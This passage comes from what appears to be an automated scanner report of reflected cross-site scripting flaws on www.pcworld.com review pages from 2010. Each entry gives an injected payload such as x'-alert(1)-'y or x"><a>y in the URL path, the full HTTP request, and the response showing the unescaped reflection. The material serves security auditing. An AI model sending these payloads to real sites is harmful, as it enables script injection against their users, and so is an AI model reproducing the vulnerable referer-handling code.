Set-Cookie: JSESSIONID=DF50206D4A072345DA5CBC072C92D6FF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
eadCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1658/top_10_netbooks.html1edca'-alert(1)-'9e9fad76bb9';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.110. http://www.pcworld.com/reviews/collection/1659/top_10_power_laptops.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1659/top_10_power_laptops.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db88c'-alert(1)-'5e66b828456 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1659/top_10_power_laptops.htmldb88c'-alert(1)-'5e66b828456 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA09B5F59EF2FD3EA098E5C7728B9CA0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:00:59 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
okie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1659/top_10_power_laptops.htmldb88c'-alert(1)-'5e66b828456';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.111. http://www.pcworld.com/reviews/collection/1660/top_10_ultraportable_laptops.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1660/top_10_ultraportable_laptops.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aead0'-alert(1)-'f387ed030e7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1660/top_10_ultraportable_laptops.htmlaead0'-alert(1)-'f387ed030e7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=42C016CAF8B90EC4BD7959589213E949; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:59:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1660/top_10_ultraportable_laptops.htmlaead0'-alert(1)-'f387ed030e7';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.112. http://www.pcworld.com/reviews/collection/1663/top_10_mp3_players_flashbased.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1663/top_10_mp3_players_flashbased.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 512b7'-alert(1)-'8bbbcb56674 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1663/top_10_mp3_players_flashbased.html512b7'-alert(1)-'8bbbcb56674 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B11CC99631EC7BF23286B9E023207F5A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:59 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1663/top_10_mp3_players_flashbased.html512b7'-alert(1)-'8bbbcb56674';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.113. http://www.pcworld.com/reviews/collection/1664/top_5_inkjet_printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1664/top_5_inkjet_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bacae'-alert(1)-'35c7cc7406 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1664/top_5_inkjet_printers.htmlbacae'-alert(1)-'35c7cc7406 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1664/top_5_inkjet_printers.htmlbacae'-alert(1)-'35c7cc7406';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.114. http://www.pcworld.com/reviews/collection/1665/top_encrypted_portable_drives.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/reviews/collection/1665/top_encrypted_portable_drives.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0094"><a>316fa7c9b16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reviews/collection/1665/top_encrypted_portable_drives.htmld0094"><a>316fa7c9b16 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
=pcw.main.reviews/products/storage/hard_drives/chart;pg=chart;c=2111;c=2111;c=2112;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;
&url=/reviews/collection/1665/top_encrypted_portable_drives.htmld0094"><a>316fa7c9b16"/>
...[SNIP]...

1.115. http://www.pcworld.com/reviews/collection/1665/top_encrypted_portable_drives.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1665/top_encrypted_portable_drives.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb3e7'-alert(1)-'4ea4220835e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1665/top_encrypted_portable_drives.htmlfb3e7'-alert(1)-'4ea4220835e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:54 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1665/top_encrypted_portable_drives.htmlfb3e7'-alert(1)-'4ea4220835e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.116. http://www.pcworld.com/reviews/collection/1666/best_streaming_media_players.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1666/best_streaming_media_players.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ed0'-alert(1)-'457b518acc5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1666/best_streaming_media_players.html58ed0'-alert(1)-'457b518acc5 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1666/best_streaming_media_players.html58ed0'-alert(1)-'457b518acc5';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.117. http://www.pcworld.com/reviews/collection/1668/top_bluetooth_car_kits.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1668/top_bluetooth_car_kits.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95bda'-alert(1)-'25ef1dd5626 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1668/top_bluetooth_car_kits.html95bda'-alert(1)-'25ef1dd5626 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4F3E3E029C69ADD8A86556D0A29CB4C8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1668/top_bluetooth_car_kits.html95bda'-alert(1)-'25ef1dd5626';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.118. http://www.pcworld.com/reviews/collection/1669/webbased_photo_editors.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1669/webbased_photo_editors.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e2f9'-alert(1)-'db8203a9816 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1669/webbased_photo_editors.html2e2f9'-alert(1)-'db8203a9816 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:00:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1669/webbased_photo_editors.html2e2f9'-alert(1)-'db8203a9816';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.119. http://www.pcworld.com/reviews/collection/1670/top_10_bluetooth_headsets.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1670/top_10_bluetooth_headsets.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3ee'-alert(1)-'5ae5b4c7926 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1670/top_10_bluetooth_headsets.html3c3ee'-alert(1)-'5ae5b4c7926 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EC0C60C5CE5E97639428C348F2336F9F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
'userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1670/top_10_bluetooth_headsets.html3c3ee'-alert(1)-'5ae5b4c7926';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.120. http://www.pcworld.com/reviews/collection/1671/top_10_cell_phones.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1671/top_10_cell_phones.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7140'-alert(1)-'30943296398 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1671/top_10_cell_phones.htmlf7140'-alert(1)-'30943296398 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Cookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1671/top_10_cell_phones.htmlf7140'-alert(1)-'30943296398';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.121. http://www.pcworld.com/reviews/collection/1672/top_10_unlocked_cell_phones.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1672/top_10_unlocked_cell_phones.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77639'-alert(1)-'64dc6d34a6d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1672/top_10_unlocked_cell_phones.html77639'-alert(1)-'64dc6d34a6d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=40BFE5DD3C67795393B93AC536C42648; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
serEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1672/top_10_unlocked_cell_phones.html77639'-alert(1)-'64dc6d34a6d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.122. http://www.pcworld.com/reviews/collection/1673/top_10_color_laser_multifunction_printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1673/top_10_color_laser_multifunction_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1d52'-alert(1)-'400fcdc21c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1673/top_10_color_laser_multifunction_printers.htmld1d52'-alert(1)-'400fcdc21c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FA8B335496A73A1CE83DC2153DEBF89; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1673/top_10_color_laser_multifunction_printers.htmld1d52'-alert(1)-'400fcdc21c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.123. http://www.pcworld.com/reviews/collection/1674/top_10_color_laser_printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1674/top_10_color_laser_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3e74'-alert(1)-'5847f5fba96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1674/top_10_color_laser_printers.htmld3e74'-alert(1)-'5847f5fba96 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F454EFB69D02FF498ABE04AB54F15E8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:46 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1674/top_10_color_laser_printers.htmld3e74'-alert(1)-'5847f5fba96';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.124. http://www.pcworld.com/reviews/collection/1674/top_10_color_laser_printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/reviews/collection/1674/top_10_color_laser_printers.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49a7b"><a>97021eacf98 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reviews/collection/1674/top_10_color_laser_printers.html49a7b"><a>97021eacf98 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0C421483EBF86E7A61BAF73B4D6E5FB6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
rld.com/pixel.gif?ad=pcw.main.reviews/products/printers/chart;pg=chart;c=2106;c=2106;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;
&url=/reviews/collection/1674/top_10_color_laser_printers.html49a7b"><a>97021eacf98"/>
...[SNIP]...

1.125. http://www.pcworld.com/reviews/collection/1675/top_10_inkjet_multifunction_printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1675/top_10_inkjet_multifunction_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f51b1'-alert(1)-'214faa0a304 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1675/top_10_inkjet_multifunction_printers.htmlf51b1'-alert(1)-'214faa0a304 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:00:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
);
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1675/top_10_inkjet_multifunction_printers.htmlf51b1'-alert(1)-'214faa0a304';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.126. http://www.pcworld.com/reviews/collection/1676/top_10_monochrome_laser_printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
